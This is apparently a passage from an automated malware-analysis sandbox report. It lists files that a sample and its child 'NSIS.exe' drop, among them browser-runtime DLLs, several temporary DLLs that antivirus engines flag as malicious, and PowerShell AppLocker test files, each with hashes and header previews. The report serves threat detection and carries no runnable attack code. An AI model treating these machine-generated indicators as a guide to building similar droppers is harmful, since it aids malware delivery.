                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d.....Ne.........." ......8..........<).......................................K......JK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\ffmpeg.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2929152
                                                                                                                                                                                            Entropy (8bit):6.70454100720416
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:ZBAnytEwrZu/3Q8rvnh2UGH6qfhtvRIdefZiC6Cry2:ZBFE6kfbrvnh21K+io
                                                                                                                                                                                            MD5:5A168CB3EA9D0E7400BAABF60F6AB933
                                                                                                                                                                                            SHA1:82A86CB7F42294AB4AD6669C19B92605D960B676
                                                                                                                                                                                            SHA-256:AF5F1BC9F6A73750FA0C7BF17439700CFB3AB23E1393F0C9899825417E319B54
                                                                                                                                                                                            SHA-512:7C1441ECD049543E38297A7B6929E9F3EB978422D0CE508FBE6350FFEBD297F947B8D9EC75BD2054142DCD8461EEF1BF110E040D0830DA977FDE8944BECE843D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........." ......#...................................................:...........`A..........................................*.......*.(.............9..............:.<5....*.......................*.(.....$.@...........H.*.8............................text.....#.......#................. ..`.rdata........$.......#.............@..@.data.........+.."....+.............@....pdata.......9.......+.............@..@.gxfg....+...0:..,...J,.............@..@.retplne.....`:......v,..................tls.........p:......x,.............@..._RDATA........:......z,.............@..@.reloc..<5....:..6...|,.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\icudtl.dat

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10468208
                                                                                                                                                                                            Entropy (8bit):6.265606239082294
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:196608:+SPBhORiYAXHiXUxY/iJ53IWhlVjEeIu2Y6U:++wkpHiXUxY/iJ53IWhlVjEeIZU
                                                                                                                                                                                            MD5:FFD67C1E24CB35DC109A24024B1BA7EC
                                                                                                                                                                                            SHA1:99F545BC396878C7A53E98A79017D9531AF7C1F5
                                                                                                                                                                                            SHA-256:9AE98C06CBB0EA43C5CD6B5725310C008C65E46072421A1118CB88E1DE9A8B92
                                                                                                                                                                                            SHA-512:E1A865E685D2D3BACD0916D4238A79462519D887FEB273A251120BB6AF2B4481D025F3B21CE9A1A95A49371A0AA3ECF072175BA756974E831DBFDE1F0FEAEB79
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E...(...E...)...F...).."F...1..5F..`1..EF...N..XF..PN..hF...N..xF.......F.......F.......F..@....F.......F......F..0....F.......G......$G......7G......JG......]G..@...pG.......G.......G..@....G.......G.......G..@....G.......G..p....H..`....H.......H..@...AH......TH..p...gH.....zH.......H..`....H.......H.......H..P....H.......H......H..`....I......%I..P...:I......RI.....bI..@...uI.......I.......I.......I..P....I.......I.......I..0....I.......J... ...J.. !..-J..@$..=J...$..PJ...$..qJ.......J...<...J....&..J....&..J.. .&..J....&..K..`.&..K....&.3K....&.JK..0.&.aK....'.xK....'..K....'..K...(..K....(..K...O)..K....)..L..0Q*.>L..`.*.gL..Pi+..L....+..L...i,..L....,..L..P}-..M..@.-.,M.. .-.EM....-.\M....-.uM....-..M...$...M..0%...M....0..M...j0..M..`.0..N..p.0.1N....0.AN....0.TN..@.0.iN....0..N..0.0..N....0..N....0..N....1..N....1..N..

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\libEGL.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):493056
                                                                                                                                                                                            Entropy (8bit):6.3672588781107775
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:0PfRujpqWG9btH+M1wLPfj9iDcHetGsHUN0dxI2H6sNkD4Fvh2W:eAWt+MWLPfjkVGbN0dxI2H63D4Bh2
                                                                                                                                                                                            MD5:39CCF402A62F068A8C573B45EA96154D
                                                                                                                                                                                            SHA1:57CEB915EA6F88C7FCCA35339BF951659C0338AB
                                                                                                                                                                                            SHA-256:8649D77ACE8E5753B9A10E7AE3349AAFA9D8E3406BA9C8C36A59633A84B3C41B
                                                                                                                                                                                            SHA-512:C4F9225C54D413176CB3DD2B26D429493FD056C7C283BC7A1C52B4A2059DBB11380DAF5D847BE1FF29F058BA0EF44D4BF66A3D9E9A600000DC8F6D20DFB2ED03
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........." .....l................................................................`A.........................................l......h{..(.......x....P..l?..............<....d.......................c..(.......@...........p~...............................text....k.......l.................. ..`.rdata..lr.......t...p..............@..@.data....K....... ..................@....pdata..l?...P...@..................@..@.gxfg... &.......(...D..............@..@.retplne.............l...................tls....!............n..............@..._RDATA...............p..............@..@.rsrc...x............r..............@..@.reloc..<............x..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\libGLESv2.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8418304
                                                                                                                                                                                            Entropy (8bit):6.508090684401189
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:Q7XpFwEPVsR+1HYJnahAB4tVsX43wYMg:QXVrAtsw
                                                                                                                                                                                            MD5:F055A130C79BD517BDB53B1F8A38BD3B
                                                                                                                                                                                            SHA1:9FBA0AD4BA973BB285B23CC125004BAF61A98B5A
                                                                                                                                                                                            SHA-256:45B53759392B81CE7D916B3F1CF02BE30289809BD31D09FC1524EF2609183B17
                                                                                                                                                                                            SHA-512:D9DCB217F268862C577CACF4E9F84C63E02B647113D484338A74EB0B24FADD6D87B4E7A551DD1EF692BB38E44562BFF848982ACB62840D4F49F91A7751320E34
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........." ......d...........N......................................`............`A........................................m.w.......x.d....p........}..H....................w.......................w.(.....d.@.............x.......w.@....................text.....d.......d................. ..`.rdata..D.....d.......d.............@..@.data.........y.......y.............@....pdata...H....}..J....}.............@..@.gxfg....-...........d..............@..@.retplne.....@...........................tls....B....P......................@..._RDATA.......`......................@..@.rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):262144
                                                                                                                                                                                            Entropy (8bit):7.040362388355635
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:1YY/D4hH334/EDRom7sMD+ztiU6YW9+cYjb0w7C+TS4idLekmS:1YYkhYeRoHt8U6xwcmb0wr1S
                                                                                                                                                                                            MD5:B9C1E07B4B2EDA5D3650ACAD008B8374
                                                                                                                                                                                            SHA1:5F193013D0F9CAA41E1A1B2441E5E969315803C7
                                                                                                                                                                                            SHA-256:A94785C2269DA10BC56B8B2D526E6028B22D62D0961DB3129ABC0208416C119E
                                                                                                                                                                                            SHA-512:67EFFA650CEB69AFBE040385F017F22BA270AB04AB7CF9AB5B2A64F4D0ECB6D6F29809BD49EE9C9F0AD42D9BFBAB595F213FB276259D62F8C48D97431AFD0708
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....IEg...........!.....z..........!........................................`............@.........................@...R.......(....0.......................@..@...x............................... ...................$............................text....x.......z.................. ..`.rdata...`.......b...~..............@..@.data...H...........................@....00cfg....... ......................@..@.rsrc........0......................@..@.reloc..@....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):226816
                                                                                                                                                                                            Entropy (8bit):6.641421803992435
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:6BrX/YVAjaKHMVJcjt4FyZTYTC1leMllGbmPVMpJv:6B7XmFJQtHZTkojllGbmPVMj
                                                                                                                                                                                            MD5:66DE65D980D40F3AAAC3DA64BE631A91
                                                                                                                                                                                            SHA1:E9DB45421829AADF312EE888F5340ADE4545AF89
                                                                                                                                                                                            SHA-256:1CB9FCC2D76F51DBD08D58209C3E732B1ABD0C1C0A3760D95374C68C890FF010
                                                                                                                                                                                            SHA-512:FA8BC38B7C5D663497C1798A292D75F768D528CFE272F23C1CC3A4CDAE80229772832BD45B54D2CE1815D347C941371EB87B84DCC794EAAE515109F5B71F2FB4
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...+IEg.........." ......................................................................`.........................................P+..R....0..(............p..................H...p*.............................. ...@............3..H............................text...X........................... ..`.rdata..............................@..@.data...p....P.......8..............@....pdata.......p.......D..............@..@.00cfg..8............V..............@..@.gxfg...p............X..............@..@.retplne.............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):240640
                                                                                                                                                                                            Entropy (8bit):6.667927891589239
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:esErpWAZCtSlQ1iXhZccj6sfkuUYLB+UjNQANSSpv:3E9ziycQ6HuUM95QANSSp
                                                                                                                                                                                            MD5:92B547FB6A5E079A00955B13E67E415B
                                                                                                                                                                                            SHA1:28EAFA6CDDC0CD132B3AB1CD4C00A0A7C8A04014
                                                                                                                                                                                            SHA-256:75A0725E4560801B81B0CC9A35A805012403072EBCE5F70500C2435B6E128056
                                                                                                                                                                                            SHA-512:1F764832690BC718C798F30250977D6A38D47E6093CBC2CA1BC7665386C4FDC55DECBD324302F59AAD15238EC9F8AC3EF7DF5CC85E090309AAF2782B36220471
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...dIEg.........." ......................................................... ............`..........................................[..R...2a..(...............................H....[.............................. ...@............c..H............................text...H........................... ..`.rdata..L...........................@..@.data...p............n..............@....pdata...............z..............@..@.00cfg..8...........................@..@.gxfg...p...........................@..@.retplne................................_RDATA..............................@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8e6f904c-93b6-4e7c-b442-119a15f71127.tmp.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2198952
                                                                                                                                                                                            Entropy (8bit):6.563177058140165
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:f0eL6aJyxz8eGSfmOifv0LkifQvl9Hu1QEBWfzbnWKNSq:seLWz8TSfmxfv05Qvl9Hu1fBWfzbnWs
                                                                                                                                                                                            MD5:3AEF228FB7EE187160482084D36C9726
                                                                                                                                                                                            SHA1:8B76990C5061890C94F81F504C5782912A58D8A6
                                                                                                                                                                                            SHA-256:C885DF88693496D5C28AD16A1ECDE259E191F54AD76428857742AF843B846C53
                                                                                                                                                                                            SHA-512:E659A7CF12C6B41879E4CE987E4CD1CEFCE2FFC74E06817667FA833764F36F25CC5F8374DBC844B68B787ACAC011C7B8C8F2B74563BF8A96F623EBB110A593DA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ck.'...'...'...lr..<...lr......lr......lr..&...q..3...q..0...q..K...lr......'...D...q..&...q..4...qp.&...'...&...q..&...Rich'...........PE..L...7..c.........."....!.\...................p....@..........................@".....h.!...@..........................................@...............f!..'.... .h%..pw..T....................x.......v..@............p..D............................text...<Z.......\.................. ..`.rdata..R....p.......`..............@..@.data........@...Z..."..............@....rsrc........@.......|..............@..@.reloc..h%.... ..&...@..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2btyxsv5.nj4.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zz54e0y.4yg.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2xw4aak.zay.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3wzxiao.uqy.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiewpqaf.0pk.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gvf2v1oa.pkg.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i25unvzm.xoj.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jo4jrgph.awb.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lg4jybfq.iy2.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxhs0gfl.n5i.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5oqatxb.s2k.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qx5sitmy.ngj.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
